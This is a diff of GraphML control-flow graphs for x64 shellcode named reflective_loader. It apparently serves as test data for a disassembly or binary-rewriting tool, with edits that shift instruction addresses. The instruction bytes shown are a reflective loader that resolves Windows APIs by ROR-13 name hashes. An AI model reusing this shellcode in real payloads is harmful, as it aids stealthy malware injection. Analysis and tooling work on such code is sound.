-          <data key="instruction.source">jmp r11</data>
-        </node>
-        <edge source="block.0x15de:instruction.0x15de" target="block.0x15de:instruction.0x15e6"/>
-        <edge source="block.0x15de:instruction.0x15e2" target="block.0x15de:instruction.0x15e6"/>
-        <edge source="block.0x15de:instruction.0x15e2" target="block.0x15de:instruction.0x15e9"/>
-        <edge source="block.0x15de:instruction.0x15e6" target="block.0x15de:instruction.0x15e9"/>
       </graph>
+    </node>
+    <node id="block.0x15df">
+      <data key="address">0x15df</data>
+      <data key="type">data</data>
+      <data key="data.hex">0110022004400440</data>
     </node>
     <edge source="block.0x1000" target="block.0x103c"/>
     <edge source="block.0x103c" target="block.0x1041"/>
@@ -3687,20 +3738,21 @@
     <edge source="block.0x147c" target="block.0x1485"/>
     <edge source="block.0x1485" target="block.0x148e"/>
     <edge source="block.0x148e" target="block.0x14aa"/>
-    <edge source="block.0x14aa" target="block.0x14b3"/>
-    <edge source="block.0x14b3" target="block.0x14bb"/>
-    <edge source="block.0x14bb" target="block.0x14d2"/>
-    <edge source="block.0x14d2" target="block.0x14da"/>
-    <edge source="block.0x14da" target="block.0x1529"/>
-    <edge source="block.0x1529" target="block.0x152d"/>
-    <edge source="block.0x152d" target="block.0x1539"/>
-    <edge source="block.0x1539" target="block.0x1564"/>
-    <edge source="block.0x1564" target="block.0x157b"/>
-    <edge source="block.0x157b" target="block.0x1592"/>
-    <edge source="block.0x1592" target="block.0x15ca"/>
-    <edge source="block.0x15ca" target="block.0x15cc"/>
-    <edge source="block.0x15cc" target="block.0x15d3"/>
-    <edge source="block.0x15d3" target="block.0x15dd"/>
-    <edge source="block.0x15dd" target="block.0x15de"/>
+    <edge source="block.0x14aa" target="block.0x14af"/>
+    <edge source="block.0x14af" target="block.0x14b7"/>
+    <edge source="block.0x14b7" target="block.0x14c6"/>
+    <edge source="block.0x14c6" target="block.0x151a"/>
+    <edge source="block.0x151a" target="block.0x151e"/>
+    <edge source="block.0x151e" target="block.0x1527"/>
+    <edge source="block.0x1527" target="block.0x1552"/>
+    <edge source="block.0x1552" target="block.0x1569"/>
+    <edge source="block.0x1569" target="block.0x1580"/>
+    <edge source="block.0x1580" target="block.0x158e"/>
+    <edge source="block.0x158e" target="block.0x15c6"/>
+    <edge source="block.0x15c6" target="block.0x15c8"/>
+    <edge source="block.0x15c8" target="block.0x15cf"/>
+    <edge source="block.0x15cf" target="block.0x15d9"/>
+    <edge source="block.0x15d9" target="block.0x15da"/>
+    <edge source="block.0x15da" target="block.0x15df"/>
   </graph>
 </graphml>

--- a/data/shellcode/reflective_loader.x64.graphml
+++ b/data/shellcode/reflective_loader.x64.graphml
@@ -386,8 +386,8 @@
         <node id="block.0x108c:instruction.0x108f">
           <data key="address">0x108f</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">0f8407020000</data>
-          <data key="instruction.source">je 0x129c</data>
+          <data key="instruction.hex">0f840a020000</data>
+          <data key="instruction.source">je 0x129f</data>
         </node>
         <edge source="block.0x108c:instruction.0x108c" target="block.0x108c:instruction.0x108f"/>
       </graph>
@@ -419,8 +419,8 @@
         <node id="block.0x1095:instruction.0x10a1">
           <data key="address">0x10a1</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">0f84e9010000</data>
-          <data key="instruction.source">je 0x1290</data>
+          <data key="instruction.hex">0f84ec010000</data>
+          <data key="instruction.source">je 0x1293</data>
         </node>
         <edge source="block.0x1095:instruction.0x1095" target="block.0x1095:instruction.0x1099"/>
         <edge source="block.0x1095:instruction.0x1099" target="block.0x1095:instruction.0x109e"/>
@@ -442,59 +442,45 @@
         <node id="block.0x10a7:instruction.0x10ab">
           <data key="address">0x10ab</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">4531e4</data>
-          <data key="instruction.source">xor r12d, r12d</data>
+          <data key="instruction.hex">41bc00000000</data>
+          <data key="instruction.source">mov r12d, 0</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x10ae">
-      <data key="address">0x10ae</data>
+    <node id="block.0x10b1">
+      <data key="address">0x10b1</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x10ae</data>
+        <data key="address">0x10b1</data>
         <data key="type">instructions</data>
-        <node id="block.0x10ae:instruction.0x10ae">
-          <data key="address">0x10ae</data>
+        <node id="block.0x10b1:instruction.0x10b1">
+          <data key="address">0x10b1</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41c1cc0d</data>
           <data key="instruction.source">ror r12d, 0xd</data>
         </node>
-        <node id="block.0x10ae:instruction.0x10b2">
-          <data key="address">0x10b2</data>
+        <node id="block.0x10b1:instruction.0x10b5">
+          <data key="address">0x10b5</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0fb61a</data>
           <data key="instruction.source">movzx ebx, byte ptr [rdx]</data>
         </node>
-        <node id="block.0x10ae:instruction.0x10b5">
-          <data key="address">0x10b5</data>
+        <node id="block.0x10b1:instruction.0x10b8">
+          <data key="address">0x10b8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">80fb61</data>
           <data key="instruction.source">cmp bl, 0x61</data>
         </node>
-        <node id="block.0x10ae:instruction.0x10b8">
-          <data key="address">0x10b8</data>
+        <node id="block.0x10b1:instruction.0x10bb">
+          <data key="address">0x10bb</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7203</data>
-          <data key="instruction.source">jb 0x10bd</data>
+          <data key="instruction.source">jb 0x10c0</data>
         </node>
-        <edge source="block.0x10ae:instruction.0x10ae" target="block.0x10ae:instruction.0x10b5"/>
-        <edge source="block.0x10ae:instruction.0x10ae" target="block.0x10ae:instruction.0x10b8"/>
-        <edge source="block.0x10ae:instruction.0x10b2" target="block.0x10ae:instruction.0x10b5"/>
-        <edge source="block.0x10ae:instruction.0x10b5" target="block.0x10ae:instruction.0x10b8"/>
-      </graph>
-    </node>
-    <node id="block.0x10ba">
-      <data key="address">0x10ba</data>
-      <data key="type">instructions-graph</data>
-      <graph edgedefault="directed">
-        <data key="address">0x10ba</data>
-        <data key="type">instructions</data>
-        <node id="block.0x10ba:instruction.0x10ba">
-          <data key="address">0x10ba</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">80eb20</data>
-          <data key="instruction.source">sub bl, 0x20</data>
-        </node>
+        <edge source="block.0x10b1:instruction.0x10b1" target="block.0x10b1:instruction.0x10b8"/>
+        <edge source="block.0x10b1:instruction.0x10b1" target="block.0x10b1:instruction.0x10bb"/>
+        <edge source="block.0x10b1:instruction.0x10b5" target="block.0x10b1:instruction.0x10b8"/>
+        <edge source="block.0x10b1:instruction.0x10b8" target="block.0x10b1:instruction.0x10bb"/>
       </graph>
     </node>
     <node id="block.0x10bd">
@@ -506,3147 +492,3161 @@
         <node id="block.0x10bd:instruction.0x10bd">
           <data key="address">0x10bd</data>
           <data key="type">instruction</data>
+          <data key="instruction.hex">80eb20</data>
+          <data key="instruction.source">sub bl, 0x20</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x10c0">
+      <data key="address">0x10c0</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10c0</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10c0:instruction.0x10c0">
+          <data key="address">0x10c0</data>
+          <data key="type">instruction</data>
           <data key="instruction.hex">4101dc</data>
           <data key="instruction.source">add r12d, ebx</data>
         </node>
-        <node id="block.0x10bd:instruction.0x10c0">
-          <data key="address">0x10c0</data>
+        <node id="block.0x10c0:instruction.0x10c3">
+          <data key="address">0x10c3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48ffc2</data>
           <data key="instruction.source">inc rdx</data>
         </node>
-        <node id="block.0x10bd:instruction.0x10c3">
-          <data key="address">0x10c3</data>
+        <node id="block.0x10c0:instruction.0x10c6">
+          <data key="address">0x10c6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48ffc9</data>
           <data key="instruction.source">dec rcx</data>
         </node>
-        <node id="block.0x10bd:instruction.0x10c6">
-          <data key="address">0x10c6</data>
+        <node id="block.0x10c0:instruction.0x10c9">
+          <data key="address">0x10c9</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">75e6</data>
-          <data key="instruction.source">jne 0x10ae</data>
+          <data key="instruction.source">jne 0x10b1</data>
         </node>
-        <edge source="block.0x10bd:instruction.0x10bd" target="block.0x10bd:instruction.0x10c0"/>
-        <edge source="block.0x10bd:instruction.0x10c0" target="block.0x10bd:instruction.0x10c3"/>
-        <edge source="block.0x10bd:instruction.0x10c3" target="block.0x10bd:instruction.0x10c6"/>
+        <edge source="block.0x10c0:instruction.0x10c0" target="block.0x10c0:instruction.0x10c3"/>
+        <edge source="block.0x10c0:instruction.0x10c3" target="block.0x10c0:instruction.0x10c6"/>
+        <edge source="block.0x10c0:instruction.0x10c6" target="block.0x10c0:instruction.0x10c9"/>
       </graph>
     </node>
-    <node id="block.0x10c8">
-      <data key="address">0x10c8</data>
+    <node id="block.0x10cb">
+      <data key="address">0x10cb</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x10c8</data>
+        <data key="address">0x10cb</data>
         <data key="type">instructions</data>
-        <node id="block.0x10c8:instruction.0x10c8">
-          <data key="address">0x10c8</data>
+        <node id="block.0x10cb:instruction.0x10cb">
+          <data key="address">0x10cb</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4181fc5bbc4a6a</data>
           <data key="instruction.source">cmp r12d, 0x6a4abc5b</data>
         </node>
-        <node id="block.0x10c8:instruction.0x10cf">
-          <data key="address">0x10cf</data>
+        <node id="block.0x10cb:instruction.0x10d2">
+          <data key="address">0x10d2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7412</data>
-          <data key="instruction.source">je 0x10e3</data>
+          <data key="instruction.source">je 0x10e6</data>
         </node>
-        <edge source="block.0x10c8:instruction.0x10c8" target="block.0x10c8:instruction.0x10cf"/>
+        <edge source="block.0x10cb:instruction.0x10cb" target="block.0x10cb:instruction.0x10d2"/>
       </graph>
     </node>
-    <node id="block.0x10d1">
-      <data key="address">0x10d1</data>
+    <node id="block.0x10d4">
+      <data key="address">0x10d4</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x10d1</data>
+        <data key="address">0x10d4</data>
         <data key="type">instructions</data>
-        <node id="block.0x10d1:instruction.0x10d1">
-          <data key="address">0x10d1</data>
+        <node id="block.0x10d4:instruction.0x10d4">
+          <data key="address">0x10d4</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4181fc5d68fa3c</data>
           <data key="instruction.source">cmp r12d, 0x3cfa685d</data>
         </node>
-        <node id="block.0x10d1:instruction.0x10d8">
-          <data key="address">0x10d8</data>
+        <node id="block.0x10d4:instruction.0x10db">
+          <data key="address">0x10db</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0f84ba000000</data>
-          <data key="instruction.source">je 0x1198</data>
+          <data key="instruction.source">je 0x119b</data>
         </node>
-        <edge source="block.0x10d1:instruction.0x10d1" target="block.0x10d1:instruction.0x10d8"/>
+        <edge source="block.0x10d4:instruction.0x10d4" target="block.0x10d4:instruction.0x10db"/>
       </graph>
     </node>
-    <node id="block.0x10de">
-      <data key="address">0x10de</data>
+    <node id="block.0x10e1">
+      <data key="address">0x10e1</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x10de</data>
+        <data key="address">0x10e1</data>
         <data key="type">instructions</data>
-        <node id="block.0x10de:instruction.0x10de">
-          <data key="address">0x10de</data>
+        <node id="block.0x10e1:instruction.0x10e1">
+          <data key="address">0x10e1</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e9ad010000</data>
-          <data key="instruction.source">jmp 0x1290</data>
+          <data key="instruction.source">jmp 0x1293</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x10e3">
-      <data key="address">0x10e3</data>
+    <node id="block.0x10e6">
+      <data key="address">0x10e6</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x10e3</data>
+        <data key="address">0x10e6</data>
         <data key="type">instructions</data>
-        <node id="block.0x10e3:instruction.0x10e3">
-          <data key="address">0x10e3</data>
+        <node id="block.0x10e6:instruction.0x10e6">
+          <data key="address">0x10e6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b45a0</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x60]</data>
         </node>
-        <node id="block.0x10e3:instruction.0x10e7">
-          <data key="address">0x10e7</data>
+        <node id="block.0x10e6:instruction.0x10ea">
+          <data key="address">0x10ea</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b6820</data>
           <data key="instruction.source">mov r13, qword ptr [rax + 0x20]</data>
         </node>
-        <node id="block.0x10e3:instruction.0x10eb">
-          <data key="address">0x10eb</data>
+        <node id="block.0x10e6:instruction.0x10ee">
+          <data key="address">0x10ee</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c896dd0</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x30], r13</data>
         </node>
-        <node id="block.0x10e3:instruction.0x10ef">
-          <data key="address">0x10ef</data>
+        <node id="block.0x10e6:instruction.0x10f2">
+          <data key="address">0x10f2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e89a040000</data>
-          <data key="instruction.source">call 0x158e</data>
+          <data key="instruction.source">call 0x1591</data>
         </node>
-        <edge source="block.0x10e3:instruction.0x10e3" target="block.0x10e3:instruction.0x10e7"/>
-        <edge source="block.0x10e3:instruction.0x10e3" target="block.0x10e3:instruction.0x10ef"/>
-        <edge source="block.0x10e3:instruction.0x10e7" target="block.0x10e3:instruction.0x10eb"/>
-        <edge source="block.0x10e3:instruction.0x10eb" target="block.0x10e3:instruction.0x10ef"/>
+        <edge source="block.0x10e6:instruction.0x10e6" target="block.0x10e6:instruction.0x10ea"/>
+        <edge source="block.0x10e6:instruction.0x10e6" target="block.0x10e6:instruction.0x10f2"/>
+        <edge source="block.0x10e6:instruction.0x10ea" target="block.0x10e6:instruction.0x10ee"/>
+        <edge source="block.0x10e6:instruction.0x10ee" target="block.0x10e6:instruction.0x10f2"/>
       </graph>
     </node>
-    <node id="block.0x10f4">
-      <data key="address">0x10f4</data>
+    <node id="block.0x10f7">
+      <data key="address">0x10f7</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x10f4</data>
+        <data key="address">0x10f7</data>
         <data key="type">instructions</data>
-        <node id="block.0x10f4:instruction.0x10f4">
-          <data key="address">0x10f4</data>
+        <node id="block.0x10f7:instruction.0x10f7">
+          <data key="address">0x10f7</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48c78578ffffff02000000</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x88], 2</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x10ff">
-      <data key="address">0x10ff</data>
+    <node id="block.0x1102">
+      <data key="address">0x1102</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x10ff</data>
+        <data key="address">0x1102</data>
         <data key="type">instructions</data>
-        <node id="block.0x10ff:instruction.0x10ff">
-          <data key="address">0x10ff</data>
+        <node id="block.0x1102:instruction.0x1102">
+          <data key="address">0x1102</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4590</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x70]</data>
         </node>
-        <node id="block.0x10ff:instruction.0x1103">
-          <data key="address">0x1103</data>
+        <node id="block.0x1102:instruction.0x1106">
+          <data key="address">0x1106</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c0</data>
           <data key="instruction.source">test rax, rax</data>
         </node>
-        <node id="block.0x10ff:instruction.0x1106">
-          <data key="address">0x1106</data>
+        <node id="block.0x1102:instruction.0x1109">
+          <data key="address">0x1109</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0f8454010000</data>
-          <data key="instruction.source">je 0x1260</data>
+          <data key="instruction.source">je 0x1263</data>
         </node>
-        <edge source="block.0x10ff:instruction.0x10ff" target="block.0x10ff:instruction.0x1103"/>
-        <edge source="block.0x10ff:instruction.0x1103" target="block.0x10ff:instruction.0x1106"/>
+        <edge source="block.0x1102:instruction.0x1102" target="block.0x1102:instruction.0x1106"/>
+        <edge source="block.0x1102:instruction.0x1106" target="block.0x1102:instruction.0x1109"/>
       </graph>
     </node>
-    <node id="block.0x110c">
-      <data key="address">0x110c</data>
+    <node id="block.0x110f">
+      <data key="address">0x110f</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x110c</data>
+        <data key="address">0x110f</data>
         <data key="type">instructions</data>
-        <node id="block.0x110c:instruction.0x110c">
-          <data key="address">0x110c</data>
+        <node id="block.0x110f:instruction.0x110f">
+          <data key="address">0x110f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48ffc8</data>
           <data key="instruction.source">dec rax</data>
         </node>
-        <node id="block.0x110c:instruction.0x110f">
-          <data key="address">0x110f</data>
+        <node id="block.0x110f:instruction.0x1112">
+          <data key="address">0x1112</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48894590</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x70], rax</data>
         </node>
-        <node id="block.0x110c:instruction.0x1113">
-          <data key="address">0x1113</data>
+        <node id="block.0x110f:instruction.0x1116">
+          <data key="address">0x1116</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4db8</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x48]</data>
         </node>
-        <node id="block.0x110c:instruction.0x1117">
-          <data key="address">0x1117</data>
+        <node id="block.0x110f:instruction.0x111a">
+          <data key="address">0x111a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b09</data>
           <data key="instruction.source">mov ecx, dword ptr [rcx]</data>
         </node>
-        <node id="block.0x110c:instruction.0x1119">
-          <data key="address">0x1119</data>
+        <node id="block.0x110f:instruction.0x111c">
+          <data key="address">0x111c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48034dd0</data>
           <data key="instruction.source">add rcx, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x110c:instruction.0x111d">
-          <data key="address">0x111d</data>
+        <node id="block.0x110f:instruction.0x1120">
+          <data key="address">0x1120</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e8a4040000</data>
-          <data key="instruction.source">call 0x15c6</data>
+          <data key="instruction.source">call 0x15c9</data>
         </node>
-        <edge source="block.0x110c:instruction.0x110c" target="block.0x110c:instruction.0x110f"/>
-        <edge source="block.0x110c:instruction.0x110c" target="block.0x110c:instruction.0x1119"/>
-        <edge source="block.0x110c:instruction.0x110f" target="block.0x110c:instruction.0x1117"/>
-        <edge source="block.0x110c:instruction.0x110f" target="block.0x110c:instruction.0x111d"/>
-        <edge source="block.0x110c:instruction.0x1113" target="block.0x110c:instruction.0x1117"/>
-        <edge source="block.0x110c:instruction.0x1113" target="block.0x110c:instruction.0x111d"/>
-        <edge source="block.0x110c:instruction.0x1117" target="block.0x110c:instruction.0x1119"/>
-        <edge source="block.0x110c:instruction.0x1117" target="block.0x110c:instruction.0x111d"/>
-        <edge source="block.0x110c:instruction.0x1119" target="block.0x110c:instruction.0x111d"/>
+        <edge source="block.0x110f:instruction.0x110f" target="block.0x110f:instruction.0x1112"/>
+        <edge source="block.0x110f:instruction.0x110f" target="block.0x110f:instruction.0x111c"/>
+        <edge source="block.0x110f:instruction.0x1112" target="block.0x110f:instruction.0x111a"/>
+        <edge source="block.0x110f:instruction.0x1112" target="block.0x110f:instruction.0x1120"/>
+        <edge source="block.0x110f:instruction.0x1116" target="block.0x110f:instruction.0x111a"/>
+        <edge source="block.0x110f:instruction.0x1116" target="block.0x110f:instruction.0x1120"/>
+        <edge source="block.0x110f:instruction.0x111a" target="block.0x110f:instruction.0x111c"/>
+        <edge source="block.0x110f:instruction.0x111a" target="block.0x110f:instruction.0x1120"/>
+        <edge source="block.0x110f:instruction.0x111c" target="block.0x110f:instruction.0x1120"/>
       </graph>
     </node>
-    <node id="block.0x1122">
-      <data key="address">0x1122</data>
+    <node id="block.0x1125">
+      <data key="address">0x1125</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1122</data>
+        <data key="address">0x1125</data>
         <data key="type">instructions</data>
-        <node id="block.0x1122:instruction.0x1122">
-          <data key="address">0x1122</data>
+        <node id="block.0x1125:instruction.0x1125">
+          <data key="address">0x1125</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48898570ffffff</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x90], rax</data>
         </node>
-        <node id="block.0x1122:instruction.0x1129">
-          <data key="address">0x1129</data>
+        <node id="block.0x1125:instruction.0x112c">
+          <data key="address">0x112c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3d8e4e0eec</data>
           <data key="instruction.source">cmp eax, 0xec0e4e8e</data>
         </node>
-        <node id="block.0x1122:instruction.0x112e">
-          <data key="address">0x112e</data>
+        <node id="block.0x1125:instruction.0x1131">
+          <data key="address">0x1131</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7409</data>
-          <data key="instruction.source">je 0x1139</data>
+          <data key="instruction.source">je 0x113c</data>
         </node>
-        <edge source="block.0x1122:instruction.0x1122" target="block.0x1122:instruction.0x112e"/>
-        <edge source="block.0x1122:instruction.0x1129" target="block.0x1122:instruction.0x112e"/>
+        <edge source="block.0x1125:instruction.0x1125" target="block.0x1125:instruction.0x1131"/>
+        <edge source="block.0x1125:instruction.0x112c" target="block.0x1125:instruction.0x1131"/>
       </graph>
     </node>
-    <node id="block.0x1130">
-      <data key="address">0x1130</data>
+    <node id="block.0x1133">
+      <data key="address">0x1133</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1130</data>
+        <data key="address">0x1133</data>
         <data key="type">instructions</data>
-        <node id="block.0x1130:instruction.0x1130">
-          <data key="address">0x1130</data>
+        <node id="block.0x1133:instruction.0x1133">
+          <data key="address">0x1133</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3daafc0d7c</data>
           <data key="instruction.source">cmp eax, 0x7c0dfcaa</data>
         </node>
-        <node id="block.0x1130:instruction.0x1135">
-          <data key="address">0x1135</data>
+        <node id="block.0x1133:instruction.0x1138">
+          <data key="address">0x1138</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7402</data>
-          <data key="instruction.source">je 0x1139</data>
+          <data key="instruction.source">je 0x113c</data>
         </node>
-        <edge source="block.0x1130:instruction.0x1130" target="block.0x1130:instruction.0x1135"/>
+        <edge source="block.0x1133:instruction.0x1133" target="block.0x1133:instruction.0x1138"/>
       </graph>
     </node>
-    <node id="block.0x1137">
-      <data key="address">0x1137</data>
+    <node id="block.0x113a">
+      <data key="address">0x113a</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1137</data>
+        <data key="address">0x113a</data>
         <data key="type">instructions</data>
-        <node id="block.0x1137:instruction.0x1137">
-          <data key="address">0x1137</data>
+        <node id="block.0x113a:instruction.0x113a">
+          <data key="address">0x113a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eb50</data>
-          <data key="instruction.source">jmp 0x1189</data>
+          <data key="instruction.source">jmp 0x118c</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1139">
-      <data key="address">0x1139</data>
+    <node id="block.0x113c">
+      <data key="address">0x113c</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1139</data>
+        <data key="address">0x113c</data>
         <data key="type">instructions</data>
-        <node id="block.0x1139:instruction.0x1139">
-          <data key="address">0x1139</data>
+        <node id="block.0x113c:instruction.0x113c">
+          <data key="address">0x113c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b75c0</data>
           <data key="instruction.source">mov r14, qword ptr [rbp - 0x40]</data>
         </node>
-        <node id="block.0x1139:instruction.0x113d">
-          <data key="address">0x113d</data>
+        <node id="block.0x113c:instruction.0x1140">
+          <data key="address">0x1140</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">458b761c</data>
           <data key="instruction.source">mov r14d, dword ptr [r14 + 0x1c]</data>
         </node>
-        <node id="block.0x1139:instruction.0x1141">
-          <data key="address">0x1141</data>
+        <node id="block.0x113c:instruction.0x1144">
+          <data key="address">0x1144</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c0375d0</data>
           <data key="instruction.source">add r14, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1139:instruction.0x1145">
-          <data key="address">0x1145</data>
+        <node id="block.0x113c:instruction.0x1148">
+          <data key="address">0x1148</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b7db0</data>
           <data key="instruction.source">mov r15, qword ptr [rbp - 0x50]</data>
         </node>
-        <node id="block.0x1139:instruction.0x1149">
-          <data key="address">0x1149</data>
+        <node id="block.0x113c:instruction.0x114c">
+          <data key="address">0x114c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">450fb73f</data>
           <data key="instruction.source">movzx r15d, word ptr [r15]</data>
         </node>
-        <node id="block.0x1139:instruction.0x114d">
-          <data key="address">0x114d</data>
+        <node id="block.0x113c:instruction.0x1150">
+          <data key="address">0x1150</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4f8d34be</data>
           <data key="instruction.source">lea r14, [r14 + r15*4]</data>
         </node>
-        <node id="block.0x1139:instruction.0x1151">
-          <data key="address">0x1151</data>
+        <node id="block.0x113c:instruction.0x1154">
+          <data key="address">0x1154</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">458b36</data>
           <data key="instruction.source">mov r14d, dword ptr [r14]</data>
         </node>
-        <node id="block.0x1139:instruction.0x1154">
-          <data key="address">0x1154</data>
+        <node id="block.0x113c:instruction.0x1157">
+          <data key="address">0x1157</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c0375d0</data>
           <data key="instruction.source">add r14, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1139:instruction.0x1158">
-          <data key="address">0x1158</data>
+        <node id="block.0x113c:instruction.0x115b">
+          <data key="address">0x115b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b8570ffffff</data>
           <data key="instruction.source">mov eax, dword ptr [rbp - 0x90]</data>
         </node>
-        <node id="block.0x1139:instruction.0x115e">
-          <data key="address">0x115e</data>
+        <node id="block.0x113c:instruction.0x1161">
+          <data key="address">0x1161</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3d8e4e0eec</data>
           <data key="instruction.source">cmp eax, 0xec0e4e8e</data>
         </node>
-        <node id="block.0x1139:instruction.0x1163">
-          <data key="address">0x1163</data>
+        <node id="block.0x113c:instruction.0x1166">
+          <data key="address">0x1166</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7506</data>
-          <data key="instruction.source">jne 0x116b</data>
+          <data key="instruction.source">jne 0x116e</data>
         </node>
-        <edge source="block.0x1139:instruction.0x1139" target="block.0x1139:instruction.0x113d"/>
-        <edge source="block.0x1139:instruction.0x113d" target="block.0x1139:instruction.0x1141"/>
-        <edge source="block.0x1139:instruction.0x1141" target="block.0x1139:instruction.0x114d"/>
-        <edge source="block.0x1139:instruction.0x1141" target="block.0x1139:instruction.0x1154"/>
-        <edge source="block.0x1139:instruction.0x1145" target="block.0x1139:instruction.0x1149"/>
-        <edge source="block.0x1139:instruction.0x1149" target="block.0x1139:instruction.0x114d"/>
-        <edge source="block.0x1139:instruction.0x114d" target="block.0x1139:instruction.0x1151"/>
-        <edge source="block.0x1139:instruction.0x1151" target="block.0x1139:instruction.0x1154"/>
-        <edge source="block.0x1139:instruction.0x1154" target="block.0x1139:instruction.0x115e"/>
-        <edge source="block.0x1139:instruction.0x1158" target="block.0x1139:instruction.0x115e"/>
-        <edge source="block.0x1139:instruction.0x115e" target="block.0x1139:instruction.0x1163"/>
+        <edge source="block.0x113c:instruction.0x113c" target="block.0x113c:instruction.0x1140"/>
+        <edge source="block.0x113c:instruction.0x1140" target="block.0x113c:instruction.0x1144"/>
+        <edge source="block.0x113c:instruction.0x1144" target="block.0x113c:instruction.0x1150"/>
+        <edge source="block.0x113c:instruction.0x1144" target="block.0x113c:instruction.0x1157"/>
+        <edge source="block.0x113c:instruction.0x1148" target="block.0x113c:instruction.0x114c"/>
+        <edge source="block.0x113c:instruction.0x114c" target="block.0x113c:instruction.0x1150"/>
+        <edge source="block.0x113c:instruction.0x1150" target="block.0x113c:instruction.0x1154"/>
+        <edge source="block.0x113c:instruction.0x1154" target="block.0x113c:instruction.0x1157"/>
+        <edge source="block.0x113c:instruction.0x1157" target="block.0x113c:instruction.0x1161"/>
+        <edge source="block.0x113c:instruction.0x115b" target="block.0x113c:instruction.0x1161"/>
+        <edge source="block.0x113c:instruction.0x1161" target="block.0x113c:instruction.0x1166"/>
       </graph>
     </node>
-    <node id="block.0x1165">
-      <data key="address">0x1165</data>
+    <node id="block.0x1168">
+      <data key="address">0x1168</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1165</data>
+        <data key="address">0x1168</data>
         <data key="type">instructions</data>
-        <node id="block.0x1165:instruction.0x1165">
-          <data key="address">0x1165</data>
+        <node id="block.0x1168:instruction.0x1168">
+          <data key="address">0x1168</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8975f8</data>
           <data key="instruction.source">mov qword ptr [rbp - 8], r14</data>
         </node>
-        <node id="block.0x1165:instruction.0x1169">
-          <data key="address">0x1169</data>
+        <node id="block.0x1168:instruction.0x116c">
+          <data key="address">0x116c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eb04</data>
-          <data key="instruction.source">jmp 0x116f</data>
+          <data key="instruction.source">jmp 0x1172</data>
         </node>
